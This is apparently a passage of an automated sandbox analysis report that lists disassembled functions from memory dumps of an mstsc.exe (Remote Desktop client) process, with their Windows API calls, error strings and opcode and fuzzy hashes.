                                                                                                              • Opcode Fuzzy Hash: f1b99af8156b5b30a0e7a56dd41edc45c5814d99705cd3d9476d5a66a8463954
                                                                                                              • Instruction Fuzzy Hash: F1411671A44204BFEB59AE98DC8AF263BAAFB44714F150059F502DB1E2D778E901CB92
                                                                                                              Function 007ED176 Relevance: 9.1, APIs: 6, Instructions: 79threadpipeCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DisconnectNamedPipe.KERNEL32(?,00000000,00000008,00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008), ref: 007ED1A5
                                                                                                              • CloseHandle.KERNEL32(?,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1AE
                                                                                                              • CreateThreadpoolWork.KERNEL32(007ED260,00000002,00000000), ref: 007ED1E0
                                                                                                              • SubmitThreadpoolWork.KERNEL32(00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1ED
                                                                                                              • CloseThreadpoolWork.KERNEL32(00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1F4
                                                                                                              • GetLastError.KERNEL32(?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005,Cannot allocate memory), ref: 007ED1FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ThreadpoolWork$Close$CreateDisconnectErrorHandleLastNamedPipeSubmit
                                                                                                              • String ID:
                                                                                                              • API String ID: 842603779-0
                                                                                                              • Opcode ID: 91c025093b3d8e6555edd2ea3e5ea937f8d083b67283bbe6ca03214c7cca8061
                                                                                                              • Instruction ID: a815d4cf200876363ab5e05e85cba7dfc1fd204122ad52304072a108ad437563
                                                                                                              • Opcode Fuzzy Hash: 91c025093b3d8e6555edd2ea3e5ea937f8d083b67283bbe6ca03214c7cca8061
                                                                                                              • Instruction Fuzzy Hash: 5121E232101744DFC7346F69DC89927B7AAFF89320710062DF592865A1DB39EC41DB11
                                                                                                              Function 0080D143 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0080D163
                                                                                                              • memset.MSVCRT ref: 0080D172
                                                                                                              • GetDlgItem.USER32(?,007D37BB), ref: 0080D180
                                                                                                              • GetDlgItem.USER32(?,00003381), ref: 0080D191
                                                                                                              • GetWindowPlacement.USER32(?,?,?,?,?,?,?,00000000), ref: 0080D1B2
                                                                                                              • GetWindowPlacement.USER32(00000000,?,?,?,?,?,?,00000000), ref: 0080D1BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemPlacementWindowmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2290485045-0
                                                                                                              • Opcode ID: c1ba2b54835dc69f2a03dc692739d4f918a952e1b8543a53f2be1fa375263107
                                                                                                              • Instruction ID: 44a89aca2f86f236341705e9cf62ff8778838769ce13b04d5861d6bededc2cc2
                                                                                                              • Opcode Fuzzy Hash: c1ba2b54835dc69f2a03dc692739d4f918a952e1b8543a53f2be1fa375263107
                                                                                                              • Instruction Fuzzy Hash: 0D114272E00318BBDB14AFE9EC49DAF7B79FB84700F044129F509E7291DA709905CBA0
                                                                                                              Function 007D70F9 Relevance: 9.1, APIs: 6, Instructions: 67memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$memcpy_s$AllocFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 3865269606-0
                                                                                                              • Opcode ID: 2c2b9b033e5b5f34c1ddd599af289e2c91a10d33acd57876631b53cdb3327632
                                                                                                              • Instruction ID: c6b7ec6e5617fccc51f239c169d7c6186ed7a0762373693dfbfe998c30f87f72
                                                                                                              • Opcode Fuzzy Hash: 2c2b9b033e5b5f34c1ddd599af289e2c91a10d33acd57876631b53cdb3327632
                                                                                                              • Instruction Fuzzy Hash: FC119371604209EFEB109F68DC88E6A77FAFF84354B24092AF845C7261EB76DD10DB60
                                                                                                              Function 007C5027 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,00003328,?), ref: 007C5049
                                                                                                              • CheckDlgButton.USER32(?,00003330,?), ref: 007C505F
                                                                                                              • CheckDlgButton.USER32(?,0000332F,?), ref: 007C5075
                                                                                                              • CheckDlgButton.USER32(?,00003329,?), ref: 007C508C
                                                                                                              • CheckDlgButton.USER32(?,0000332A,?), ref: 007C50A4
                                                                                                              • CheckDlgButton.USER32(?,0000332B,?), ref: 007C50BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ButtonCheck
                                                                                                              • String ID:
                                                                                                              • API String ID: 83588225-0
                                                                                                              • Opcode ID: 7b61b818ac66001c1ed03f3c9af74f8a22c5737460c2ec1f4d0003e9cd259d08
                                                                                                              • Instruction ID: da22532f0aeff1c6baee21891780138881035e9b964fb7fb8bbb8e27538fff9d
                                                                                                              • Opcode Fuzzy Hash: 7b61b818ac66001c1ed03f3c9af74f8a22c5737460c2ec1f4d0003e9cd259d08
                                                                                                              • Instruction Fuzzy Hash: 02118CB6350B197FE3010F0CEC86D62BB7CFB08759B014236F900CA9E0DB68DE269690
                                                                                                              Function 007A411C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,?,00000000), ref: 0079ECC5
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,000000AB,00000000), ref: 0079ECE5
                                                                                                                • Part of subcall function 0079ECAA: memset.MSVCRT ref: 0079ECF9
                                                                                                                • Part of subcall function 0079ECAA: GetMenuItemInfoW.USER32(?,-0000003C,00000000,?), ref: 0079ED10
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,-0000003C,00000000), ref: 0079ED1F
                                                                                                              • IsWindow.USER32(?), ref: 007A423F
                                                                                                                • Part of subcall function 0079AF9C: SendMessageW.USER32(00000000,00000111,000033B3,00000000), ref: 0079AFB1
                                                                                                              • PostMessageW.USER32(?,00008102,?,?), ref: 007A429E
                                                                                                                • Part of subcall function 007BB520: SysFreeString.OLEAUT32(00000000), ref: 007BB571
                                                                                                                • Part of subcall function 007BB520: SysFreeString.OLEAUT32(00000000), ref: 007BB5A6
                                                                                                              • IsWindow.USER32(?), ref: 007A438D
                                                                                                              • GetDlgItem.USER32(?,00001394), ref: 007A439F
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00797ECC: TraceMessage.ADVAPI32(00000008,?,0000002B,00792FE8,00000054,0088B068,00000004,00000000,00000005,00000000,00000004,00000000,00000000,00000000,0088A000), ref: 00797F14
                                                                                                              Strings
                                                                                                              • GetUpdatesFromControl failed!, xrefs: 007A4352
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DeleteFreeMessage$ItemStringWindow$AddressHandleInfoLibraryModulePostProcSendTracememset
                                                                                                              • String ID: GetUpdatesFromControl failed!
                                                                                                              • API String ID: 2203156620-1427388055
                                                                                                              • Opcode ID: 68e56c3b62dbdd79027d20efa2c22d014696e94d88968e7fac2dfa56ce6086c3
                                                                                                              • Instruction ID: fe3c8a87d90500d2b84c5b66f270d0f82f32a80c7d3d7fa0612426d0f1fbaa24
                                                                                                              • Opcode Fuzzy Hash: 68e56c3b62dbdd79027d20efa2c22d014696e94d88968e7fac2dfa56ce6086c3
                                                                                                              • Instruction Fuzzy Hash: CA817F30600204DFDF19DF58C889BA97BA2FFC5314F1441A9ED45AB2A3DB7AD842CB51
                                                                                                              Function 04C220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                                                                                              • Instruction ID: 9dbce77a74a2e1b8a3208f197390e57cda0cd9c5c6333341858ccf91d83e5b02
                                                                                                              • Opcode Fuzzy Hash: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                                                                                              • Instruction Fuzzy Hash: 5921337AA00129ABDB10DEB9DD40EFE77F9EF54644F4401A6E945E3200E770AA019BA1
                                                                                                              Function 007F817A Relevance: 7.6, APIs: 5, Instructions: 85threadsleepCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread_ftol2_sse$CurrentSleepSwitch
                                                                                                              • String ID:
                                                                                                              • API String ID: 289552206-0
                                                                                                              • Opcode ID: 220d3394514e9466d6949bffd805dbaec0e04bec4859b0c084827ecda9982698
                                                                                                              • Instruction ID: 5b33fd12e4ffbedc607831e70274d1a6ff8e8eab592f03f93d96d0803fd71da2
                                                                                                              • Opcode Fuzzy Hash: 220d3394514e9466d6949bffd805dbaec0e04bec4859b0c084827ecda9982698
                                                                                                              • Instruction Fuzzy Hash: 29213A32A00A1DEBDB90AB69DC4577AB7A9FB44360F218139E606D6340DF78DC529352
                                                                                                              Function 007A2178 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              • DeleteMenu.USER32(0000000B,?,00000000), ref: 007A2265
                                                                                                              Strings
                                                                                                              • Unable to get property UTREG_UI_MANUAL_CLIP_SYNC_ENABLED!, xrefs: 007A2235
                                                                                                              • ManualClipboardSyncEnabled, xrefs: 007A2202
                                                                                                              • QueryInterface(IID_IMsRdpExtendedSettings) failed!, xrefs: 007A21D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDeleteFreeHandleLibraryMenuModuleProc
                                                                                                              • String ID: ManualClipboardSyncEnabled$QueryInterface(IID_IMsRdpExtendedSettings) failed!$Unable to get property UTREG_UI_MANUAL_CLIP_SYNC_ENABLED!
                                                                                                              • API String ID: 1846715131-2732231424
                                                                                                              • Opcode ID: 305fed15fa7c7b9fb73f43853fd099d5786c897771f757bf2f7ae9295a676248
                                                                                                              • Instruction ID: 8dba7c49e5c4e99fc3e03606da4e8db991c8bac7e2e7210e6d39f5a69114e509
                                                                                                              • Opcode Fuzzy Hash: 305fed15fa7c7b9fb73f43853fd099d5786c897771f757bf2f7ae9295a676248
                                                                                                              • Instruction Fuzzy Hash: 1C319231604200EFEF18AFACCC89B6A7BA5BF85315F254259E605971E3C7789C46DB42
                                                                                                              Function 008850D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • TlsFree.KERNEL32(?,0088BF44,00000000,?,008850CF,?,00000001,?,00000000,00000000,0088B068,?,00000002,00000000), ref: 008850F7
                                                                                                              Strings
                                                                                                              • Failed to unregister the thread window class, xrefs: 0088516E
                                                                                                              • Failed to unregister the timer window class, xrefs: 008851AE
                                                                                                              • Failed to terminate timer globals, xrefs: 0088512E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free
                                                                                                              • String ID: Failed to terminate timer globals$Failed to unregister the thread window class$Failed to unregister the timer window class
                                                                                                              • API String ID: 3978063606-2031851587
                                                                                                              • Opcode ID: e9b99942cc5d74bd737af7c66b017b1d8f8e3b8ab12492a4d1ce663ca797c20a
                                                                                                              • Instruction ID: db8168725f890d52394a6df54185c15c3bcb96f2ca0e0012b8051a10a88b88a4
                                                                                                              • Opcode Fuzzy Hash: e9b99942cc5d74bd737af7c66b017b1d8f8e3b8ab12492a4d1ce663ca797c20a
                                                                                                              • Instruction Fuzzy Hash: 8C318135200A40AFEB7ABB68EC4DB263757FB44714F280489F501CA0E2DB69CC95C752
                                                                                                              Function 04C22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
                                                                                                              • Instruction ID: e5fcf8ab5c440359f11f8aafddc64a1bb051d6132271cbfb2469db00de2f2bf1
                                                                                                              • Opcode Fuzzy Hash: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
                                                                                                              • Instruction Fuzzy Hash: 51315472A002299FDB20DE29CD50BEFB7FDEF44614F444595E849E3240EB70BA449BA1
                                                                                                              Function 007FF0F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 007FF0FB
                                                                                                              • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 007FF107
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                              • API String ID: 1646373207-919018592
                                                                                                              • Opcode ID: 4cc862342f57201c6787efdad54d68fb092bd0db07ca7c07fa0c5123bf3c00ed
                                                                                                              • Instruction ID: 9bc3913c44d38e5f050528b8b20aac64dea300f374395e3941dea400229a3eb0
                                                                                                              • Opcode Fuzzy Hash: 4cc862342f57201c6787efdad54d68fb092bd0db07ca7c07fa0c5123bf3c00ed
                                                                                                              • Instruction Fuzzy Hash: FAE01276541329B78B212F99DC0CC5EBF29FF447A17014021FD16922A1CB35DC11DBE0
                                                                                                              Function 007FA1D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 007FA200
                                                                                                                • Part of subcall function 008067E6: wcstol.MSVCRT ref: 00806835
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ActivityControlEventmemsetwcstol
                                                                                                              • String ID: CUT::GetServerNameFromFullAddress failed!$StringCchCopy failed$pProfile->SetProxyHostName
                                                                                                              • API String ID: 3358987373-1208241228
                                                                                                              • Opcode ID: 9b8523b6ef186980e7891d994ce68eb812ab451fdb88a157ef8127fce1997b80
                                                                                                              • Instruction ID: 163578131c305d48384435edbf78ca071617ea80323e1233f3366f80e562d778
                                                                                                              • Opcode Fuzzy Hash: 9b8523b6ef186980e7891d994ce68eb812ab451fdb88a157ef8127fce1997b80
                                                                                                              • Instruction Fuzzy Hash: 5D413DB1718358A7D729AE28C849B763696FF85714F150159EA0ACB3E1DB2CCC0483D3
                                                                                                              Function 00888189 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 113memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              • LocalFree.KERNEL32(?), ref: 00888247
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00888264
                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 008882C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$ActivityAllocControlEventFreememcpy
                                                                                                              • String ID: *ppbOutBlob
                                                                                                              • API String ID: 1585473126-1332186423
                                                                                                              • Opcode ID: 703aec4f541a8296661f9f66d669d840777a14dff003ce081450b73211f36e40
                                                                                                              • Instruction ID: de7ddd3589769e5babd8fc3c6c5e5eff773433f09f49a7c4e46b73b5c63d910d
                                                                                                              • Opcode Fuzzy Hash: 703aec4f541a8296661f9f66d669d840777a14dff003ce081450b73211f36e40
                                                                                                              • Instruction Fuzzy Hash: F241C071100B11EFEB1ABF58D889F227BA6FF54724F64045AF940DB2A2CB74C844CB92
                                                                                                              Function 007D415A Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 007D417D
                                                                                                              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 007D41AB
                                                                                                              • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 007D41B7
                                                                                                              • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 007D41C8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 375572348-0
                                                                                                              • Opcode ID: 220c2388ba639815f38404c6d022437ee733cda5b437996fe9bffa199128bf3c
                                                                                                              • Instruction ID: 6fb74bb1c22d484968fcff745c13c1e7dc84354d0a765241677b289a3c99f457
                                                                                                              • Opcode Fuzzy Hash: 220c2388ba639815f38404c6d022437ee733cda5b437996fe9bffa199128bf3c
                                                                                                              • Instruction Fuzzy Hash: 02F01870A81308BBEB20AB54DC4BFD977BDFB48B04F504094B605AA1C1DBF49A548B55
                                                                                                              Function 007E10F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 007DFFE6: VariantInit.OLEAUT32(?), ref: 007E0006
                                                                                                                • Part of subcall function 007DFFE6: VariantClear.OLEAUT32(?), ref: 007E0186
                                                                                                              • GetTickCount.KERNEL32 ref: 007E1232
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCountInitTick
                                                                                                              • String ID: Listener is terminated$Wait failed
                                                                                                              • API String ID: 4072998923-971817836
                                                                                                              • Opcode ID: 3c8cb1d9c8ea313ea7017e677fbf539ca429a8296a4cdfe942b150f7f99d8896
                                                                                                              • Instruction ID: 8c73c2bc6528d1b9d7c1ce7623e316d8e4704f954cbcd4bd65ff336b89756a5c
                                                                                                              • Opcode Fuzzy Hash: 3c8cb1d9c8ea313ea7017e677fbf539ca429a8296a4cdfe942b150f7f99d8896
                                                                                                              • Instruction Fuzzy Hash: 77918E71205345CFCB18EF29C885A2E7BE6BF88310B55055DE946DB2A7DB38EC45CB82
                                                                                                              Function 0080F0AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68memoryencryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,0080DF98,?,?,?,?,?,00000000,00000000), ref: 0080F0CA
                                                                                                              • CertDuplicateCertificateContext.CRYPT32(?), ref: 0080F131
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 0079686C: TraceMessage.ADVAPI32(00000008,?,0000002B,00781B08,0000000B,0088B068,00000004,00000000,00000005,00000000,00000000,00000000,00000000,?,007DBBCC,0079A670), ref: 007968AC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressAllocCertCertificateContextDuplicateFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                              • String ID: pCertArray
                                                                                                              • API String ID: 2178560606-662488200
                                                                                                              • Opcode ID: 07d86b0e92e3bb47f9309ac5670b3dbe567f6b7328838ebe7e634f90eecd37c4
                                                                                                              • Instruction ID: b6608eb2667dd984d4e2a934c1f054a84e35671834fd26f1569a6c608cf5a86c
                                                                                                              • Opcode Fuzzy Hash: 07d86b0e92e3bb47f9309ac5670b3dbe567f6b7328838ebe7e634f90eecd37c4
                                                                                                              • Instruction Fuzzy Hash: 1C218C75600304EFD766CF5CDC89E16BBA5FB89724B1580A9FA00DB3A2D675DC00CB60
